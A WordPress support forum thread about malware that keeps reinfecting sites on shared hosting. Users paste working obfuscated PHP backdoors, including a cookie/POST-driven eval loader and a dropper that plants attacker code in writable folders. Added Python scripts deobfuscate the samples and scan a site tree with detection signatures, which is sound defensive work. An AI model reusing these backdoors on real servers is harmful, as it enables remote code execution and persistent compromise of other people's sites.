Resolved: bethplummer (@bethplummer)


    It appears my account that hosts several WordPress websites is having a malicious file issue. I don't have much experience in fixing these types of things.

    I have a Bluehost account.
    It is the cloud hosting plan, but shared I believe.
    I am using Wordfence to restore files.

    Files being affected are:
    File appears to be malicious: wp-config.php
    wp-settings.php
    File appears to be malicious: index.php
    WordPress core file modified: index.php
    WordPress core file modified: wp-settings.php

    This is an example of the code I see
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: "@include "\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f"…". The infection type is: Misc:PHP/ico.
    I am not even sure what that code does or means.

    I restore through Wordfence, but it keeps happening, and I have several websites. How do I make this stop? Is there a simple way to take care of this? I think it is odd that this is happening to new installs too, so I am not sure what to do.

Viewing 15 replies - 1 through 15 (of 15 total)
    The fact that the corruption keeps recurring suggests that the compromise/backdoor is at the server level, possibly affecting more than just your own site…

    If Wordfence isn't picking up malware or a compromise on your site directly, then the issue is likely external. You may want to inform your hosting provider so they can investigate the server.

    Hi @bethplummer
    Typically, I would recommend following the steps in "How to Clean a Hacked WordPress Site using Wordfence", but as "bluebearmedia" said, it seems that there is a backdoor still there and the attacker keeps finding his way to re-infect files again and again. In most cases your website might be hacked because there is another infected website on the same shared server; in these situations, hiring a professional security analyst to do a site cleaning for you might be necessary.

    Thanks.

    I am having the exact same problem on my Bluehost account. It started about a month ago.

    Changed all passwords and still have to clean almost daily.

    I have the same problem. I try to clean up the infected files, but the problem comes back again and again. So is there a way to remove this malware forever? I also changed all passwords and filesystem permissions.

    Thanks!

    Same problem here with about 5 sites on a shared server. It's an almost daily cleaning with Wordfence, but these cleanings don't get to the root of the infection for some reason.

    It gets into my wp-config file, I clean it, reset the permissions, then a day or two later it's infected again. I've reset server login passwords, FTP passwords, WordPress database passwords for each site, and WP logins. I'm at a loss for what else I can do. Any advice would be appreciated!

    If you put
    "\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f"
    into UNPHP.NET it decodes to this:
    /home1/maverif5/public_html/signsohio/wp-content/gallery/favicon_4d1b2f.ico

    This is a malicious file that should be deleted.

    Check Settings-Users for any Administrator accounts that you don’t recognise and delete them.
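The manual decode above can be scripted so every core file of every site can be checked the same way. The following is an added example (not code from the thread or from UNPHP.NET): it decodes the escape sequences PHP honours inside double-quoted strings (\xNN, octal, \n and friends) and pulls every escaped include/require target out of a PHP source. The SAMPLE_WP_CONFIG text is constructed here, using the exact @include string posted above.

```python
"""
Decode PHP double-quoted-string escapes and list obfuscated include targets.
Added example for this thread; not from Wordfence, UNPHP.NET or the poster.
"""
import re

# Escapes PHP recognises inside "..." strings: \xNN, \NNN (octal), \u{...}, and the simple ones.
_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|[nrtvef\\$"])')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b', 'f': '\f',
           '\\': '\\', '$': '$', '"': '"'}

# @include "..."/require_once("...") with the string body captured (escaped quotes allowed).
INCLUDE_RE = re.compile(
    r'@?(?:include_once|require_once|include|require)\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.S)


def php_unescape(s: str) -> str:
    """Turn the escaped form of a PHP double-quoted string into the runtime value."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == 'x':                 # \xNN  (PHP takes at most two hex digits)
            return chr(int(tok[1:], 16))
        if tok[0] == 'u':                 # \u{NNNN}
            return chr(int(tok[2:-1], 16))
        if tok[0] in '01234567':          # \NNN octal
            return chr(int(tok, 8))
        return _SIMPLE[tok]
    return _ESCAPE_RE.sub(repl, s)


def find_obfuscated_includes(php_source: str):
    """Return (raw, decoded) for each include whose target string uses escapes."""
    hits = []
    for m in INCLUDE_RE.finditer(php_source):
        raw = m.group(1)
        if '\\' in raw:                   # a plain path has nothing to hide
            hits.append((raw, php_unescape(raw)))
    return hits


# Constructed wp-config.php fragment carrying the @include string posted in this thread.
SAMPLE_WP_CONFIG = (
    '<?php\n'
    r'@include "\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/'
    r'\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff'
    r'\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f";' '\n'
    "define('DB_NAME', 'wp');\n"
    'require_once "wp-settings.php";\n'
)

if __name__ == "__main__":
    for raw, decoded in find_obfuscated_includes(SAMPLE_WP_CONFIG):
        print(decoded)   # /home1/maverif5/public_html/signsohio/wp-content/gallery/favicon_4d1b2f.ico
```

The decoded path is the thing to act on: the `.ico` file it points at is PHP, not an icon, and the line that pulls it in will be re-added until that file and whatever wrote it are gone.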

    Same problem here going on for several months.
    I suspect it is server level, as I have cleaned my sites and then changed all passwords (many times). Sometimes I find files that have permissions set to 000, which to me indicates root access.
    Contacted hosting company A2 Hosting every day for weeks and they keep referring me to their 3rd party contracted cleaning service.

    My host keeps shutting down my email service as the infection is generating spam from my sites.

    On the verge of cleaning and moving to a new host.

    I have downloaded what I believe to be the complete set of malicious php files if anyone is interested to take a look.

    Here is the content of one that keeps returning called files21.php:
    <?php
    $xarey = '7vk2\'x86bm3a*dnrol-H1c40e9yi#sufg5p_t';$dubiat = Array();$dubiat[] = $xarey[23].$xarey[22].$xarey[31].$xarey[3].$xarey[10].$xarey[20].$xarey[6].$xarey[8].$xarey[18].$xarey[24].$xarey[25].$xarey[0].$xarey[6].$xarey[18].$xarey[22].$xarey[23].$xarey[10].$xarey[25].$xarey[18].$xarey[6].$xarey[13].$xarey[23].$xarey[33].$xarey[18].$xarey[0].$xarey[7].$xarey[10].$xarey[10].$xarey[33].$xarey[21].$xarey[13].$xarey[25].$xarey[24].$xarey[22].$xarey[8].$xarey[13];$dubiat[] = $xarey[19].$xarey[12];$dubiat[] = $xarey[28];$dubiat[] = $xarey[21].$xarey[16].$xarey[30].$xarey[14].$xarey[36];$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[35].$xarey[15].$xarey[24].$xarey[34].$xarey[24].$xarey[11].$xarey[36];$dubiat[] = $xarey[24].$xarey[5].$xarey[34].$xarey[17].$xarey[16].$xarey[13].$xarey[24];$dubiat[] = $xarey[29].$xarey[30].$xarey[8].$xarey[29].$xarey[36].$xarey[15];$dubiat[] = $xarey[11].$xarey[15].$xarey[15].$xarey[11].$xarey[26].$xarey[35].$xarey[9].$xarey[24].$xarey[15].$xarey[32].$xarey[24];$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[17].$xarey[24].$xarey[14];$dubiat[] = $xarey[34].$xarey[11].$xarey[21].$xarey[2];foreach ($dubiat[7]($_COOKIE, $_POST) as $otktndm => $bnuui){function mosulw($dubiat, $otktndm, $suauag){return $dubiat[6]($dubiat[4]($otktndm . $dubiat[0], ($suauag / $dubiat[8]($otktndm)) + 1), 0, $suauag);}function gbkww($dubiat, $rdlduvw){return @$dubiat[9]($dubiat[1], $rdlduvw);}function zgpojvs($dubiat, $rdlduvw){$gjkxcko = $dubiat[3]($rdlduvw) % 3;if (!$gjkxcko) {eval($rdlduvw[1]($rdlduvw[2]));exit();}}$bnuui = gbkww($dubiat, $bnuui);zgpojvs($dubiat, $dubiat[5]($dubiat[2], $bnuui ^ mosulw($dubiat, $otktndm, $dubiat[8]($bnuui))));}
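The files21.php sample above never names a single function: it spells them out at runtime from a seed string (`$xarey`) and lists of character indexes (`$dubiat[]`). The following is an added example, not code from the thread, that resolves that index-array obfuscation statically so the function names can be read without executing the file. The SAMPLE input is the first statement of the posted file (the seed and the ten `$dubiat[]` assignments), reproduced here so the script has something to work on; the foreach loop is omitted.

```python
"""
Resolve $seed[N].$seed[M]... character-index obfuscation into plain strings.
Added example for this thread; not the backdoor author's code nor a scanner's.
"""
import re

# Seed string and $dubiat[] assignments copied from the posted files21.php.
SAMPLE = r"""
$xarey = '7vk2\'x86bm3a*dnrol-H1c40e9yi#sufg5p_t';$dubiat = Array();
$dubiat[] = $xarey[23].$xarey[22].$xarey[31].$xarey[3].$xarey[10].$xarey[20].$xarey[6].$xarey[8].$xarey[18].$xarey[24].$xarey[25].$xarey[0].$xarey[6].$xarey[18].$xarey[22].$xarey[23].$xarey[10].$xarey[25].$xarey[18].$xarey[6].$xarey[13].$xarey[23].$xarey[33].$xarey[18].$xarey[0].$xarey[7].$xarey[10].$xarey[10].$xarey[33].$xarey[21].$xarey[13].$xarey[25].$xarey[24].$xarey[22].$xarey[8].$xarey[13];
$dubiat[] = $xarey[19].$xarey[12];
$dubiat[] = $xarey[28];
$dubiat[] = $xarey[21].$xarey[16].$xarey[30].$xarey[14].$xarey[36];
$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[35].$xarey[15].$xarey[24].$xarey[34].$xarey[24].$xarey[11].$xarey[36];
$dubiat[] = $xarey[24].$xarey[5].$xarey[34].$xarey[17].$xarey[16].$xarey[13].$xarey[24];
$dubiat[] = $xarey[29].$xarey[30].$xarey[8].$xarey[29].$xarey[36].$xarey[15];
$dubiat[] = $xarey[11].$xarey[15].$xarey[15].$xarey[11].$xarey[26].$xarey[35].$xarey[9].$xarey[24].$xarey[15].$xarey[32].$xarey[24];
$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[17].$xarey[24].$xarey[14];
$dubiat[] = $xarey[34].$xarey[11].$xarey[21].$xarey[2];
"""

SEED_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")            # $x = '...';
PUSH_RE = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")  # $a[] = $x[1].$x[2];
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")

# Builtins that are harmless by name but, once they appear only after deobfuscation,
# mark a file as one that decodes and runs attacker-supplied input.
WATCHLIST = {"eval", "assert", "create_function", "pack", "array_merge", "str_repeat",
             "base64_decode", "gzinflate", "str_rot13", "rawurldecode", "file_put_contents"}


def php_single_quoted(raw: str) -> str:
    """Undo the only two escapes PHP honours inside '...' strings."""
    return raw.replace("\\'", "'").replace("\\\\", "\\")


def resolve_index_arrays(php_source: str) -> dict:
    """Map each $array name to the list of strings its $seed[N] pieces spell out."""
    seeds = {name: php_single_quoted(val) for name, val in SEED_RE.findall(php_source)}
    arrays = {}
    for arr, expr in PUSH_RE.findall(php_source):
        text = "".join(seeds[s][int(i)] for s, i in INDEX_RE.findall(expr))
        arrays.setdefault(arr, []).append(text)
    return arrays


def suspicious_names(arrays: dict) -> list:
    """Resolved strings that are on the watchlist, sorted for stable output."""
    return sorted({v for vals in arrays.values() for v in vals if v in WATCHLIST})


if __name__ == "__main__":
    resolved = resolve_index_arrays(SAMPLE)
    for i, value in enumerate(resolved["dubiat"]):
        print(f"$dubiat[{i}] = {value!r}")
    print("watchlist hits:", suspicious_names(resolved))
```

With `$dubiat` resolved, the posted loop reads as: for every cookie or POST value (`array_merge`), hex-decode it (`pack("H*", ...)`), XOR it against a key stream built from the parameter name plus the UUID-looking secret in `$dubiat[0]` (`str_repeat`/`substr`), split on `#` (`explode`), and if the piece count is a multiple of 3, run `eval($parts[1]($parts[2]))`. Nothing in the file is a literal `eval` argument an antivirus string match would catch, which is why the resolver, not a grep for suspicious words, is what exposes it.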

    Do a full scan with the plugin – WebDefender security. Then remove the injected files it finds if it’s not a native WordPress file. If it is, clean it.

    Thanks for the reply, Troy.
    I am using Wordfence to scan manually twice a day.
    I presume WebDefender will have similar results?
    After I remove files they get injected back a day or 2 later.

    I was in the same endless loop as you with Wordfence. WebDefender found many more files that caused the re-infections. Do it, you’ll thank me later.

    @troy7890: Thanks for the advice about WebDefender.

    It found some PHP files in the wp-content/uploads directories that Wordfence missed.

    Wow, I was using Wordfence and it was finding some files every day that I fixed or deleted, but I just installed WebDefender and ran it, and it found a boatload more files that Wordfence was not finding.

    Thanks for the tip.

    I try to install the WebDefender WordPress plugin, but I always get the following error: "Cannot write progress data to file", even with full rights on the WWW directory of the site.

    I also tried the WebDefender “Antivirus for PHP site”, but the file “cwis-scan.min.js” is missing in the download package.

    I’m desperate, could anyone help me to get WebDefender running.

    Thanks!

    Hi

    For those who have Plesk servers, you can install the "Revisium Antivirus" security extension (Extensions > Security tab > View all > search for Revisium Antivirus), then run the antivirus. After that you will see a list of all the infected files inside each directory and site; proceed with deleting all the infected ones, and don't forget to remove the infected code inside some of the files (the antivirus will guide you). That's all.

    Congrats, your server is now clean!

    Hope this helps you!

    Best

    Hi, just an addition. I was in the same endless loop with Wordfence, trying to delete these infected files with @include "\x2fh\x6fm\x651 etc.

    I think I found the file that is creating these @include "\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) Download the whole WordPress site to your computer
    2) Then search for PHP files containing the text 'rawurldecode' using Notepad++
    3) If you then find files with weird file names such as zvqbjhrl.php,
    and they also contain very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode("", array_map("jzibdoj", array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . '/*', GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER["DOCUMENT_ROOT"];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($jlolaswm, $vnuonc);echo "https://" . $_SERVER["HTTP_HOST"] . substr($jlolaswm, strlen($tghfnmi));exit();}}}

    Then delete those files.

    Success,

    ebakker66
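The procedure above (download the site, grep for rawurldecode, look for randomly named PHP files) and the earlier findings in this thread (the hex-escaped @include in core files, PHP hidden in a favicon_*.ico, PHP under wp-content/uploads) can be done in one offline pass over the downloaded tree. The following is an added example; it is not code from the thread, from Wordfence or from WebDefender. The signature list and its weights are a heuristic chosen for this example, and the mini site it scans is constructed in a temporary directory so the script runs stand-alone.

```python
"""
Offline triage of a downloaded WordPress tree for the patterns in this thread.
Added example; weights, labels and the sample tree are constructed here.
"""
import os
import re
import tempfile

PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".phar", ".inc"}

# (label, byte regex, weight). Weights are an arbitrary scoring heuristic for this example.
SIGNATURES = [
    ("hex-escaped include/require", re.compile(rb'@?(?:include|require)(?:_once)?\s*\(?\s*["\']\\x[0-9a-fA-F]'), 5),
    ("eval() of dynamic code", re.compile(rb'\beval\s*\('), 3),
    ("rawurldecode()/str_rot13() unpacking", re.compile(rb'\b(?:rawurldecode|str_rot13)\s*\('), 2),
    ("base64/gzip payload", re.compile(rb'\b(?:base64_decode|gzinflate|gzuncompress)\s*\('), 2),
    ("pack('H*') hex decode of input", re.compile(rb'\bpack\s*\(\s*["\']H\*'), 2),
    ("request-driven code path", re.compile(rb'\$_(?:COOKIE|POST|REQUEST)\b'), 1),
    ("writes files", re.compile(rb'\bfile_put_contents\s*\('), 1),
]
UPLOADS_RE = re.compile(r"(^|/)wp-content/uploads/")


def scan_file(path, root, limit=512 * 1024):
    """Return (relative path, score, reasons) for one file; only the first `limit` bytes are read."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    with open(path, "rb") as fh:
        data = fh.read(limit)
    is_php_ext = os.path.splitext(path)[1].lower() in PHP_EXT
    has_php_tag = b"<?php" in data or b"<?=" in data
    reasons, score = [], 0
    if has_php_tag and not is_php_ext:          # the favicon_*.ico trick
        reasons.append("PHP code inside a non-PHP file"); score += 5
    if is_php_ext and UPLOADS_RE.search(rel):   # uploads should hold media, not code
        reasons.append("PHP file under wp-content/uploads"); score += 3
    if is_php_ext or has_php_tag:
        for label, rx, weight in SIGNATURES:
            if rx.search(data):
                reasons.append(label); score += weight
    return rel, score, reasons


def scan_tree(root, threshold=3):
    """Walk `root` and return files scoring at or above `threshold`, highest score first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            rel, score, reasons = scan_file(os.path.join(dirpath, name), root)
            if score >= threshold:
                findings.append((rel, score, reasons))
    return sorted(findings, key=lambda f: (-f[1], f[0]))


def build_sample_tree(root=None):
    """Write a constructed mini site: two clean files and three modelled on the thread's findings."""
    root = root or tempfile.mkdtemp(prefix="wp-triage-")
    files = {
        "wp-config.php": [rb'<?php', rb'@include "\x2fh\x6fm\x651\x2fx/favicon_abc.ico";', rb"define('DB_NAME', 'wp');"],
        "wp-includes/functions.php": [rb'<?php', rb'function wp_example() { return 1; }'],
        "wp-content/themes/demo/style.css": [rb'/* Theme Name: demo */'],
        "wp-content/gallery/favicon_abc.ico": [rb'<?php', rb"eval(base64_decode($_COOKIE['q']));"],
        "wp-content/uploads/2019/zvqbjhrl.php": [rb'<?php', rb'function j($a,$b){$b=str_split(rawurldecode(str_rot13($b)));', rb'@file_put_contents($a,$b);}'],
    }
    for rel, lines in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(b"\n".join(lines) + b"\n")
    return root


if __name__ == "__main__":
    site = build_sample_tree()
    for rel, score, reasons in scan_tree(site):
        print(f"{score:3d}  {rel}  [{', '.join(reasons)}]")
```

Run it against a real download by calling `scan_tree("/path/to/site")` instead of the sample. The scoring is deliberately loose: it is a worklist for a human to open in an editor, not a verdict, and like the plugins discussed above it only finds what is on disk, so a re-infection after cleaning still points at something outside the tree (another account on the same server, stolen credentials, or a cron job).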

  • The topic ‘malicious files keep showing up’ is closed to new replies.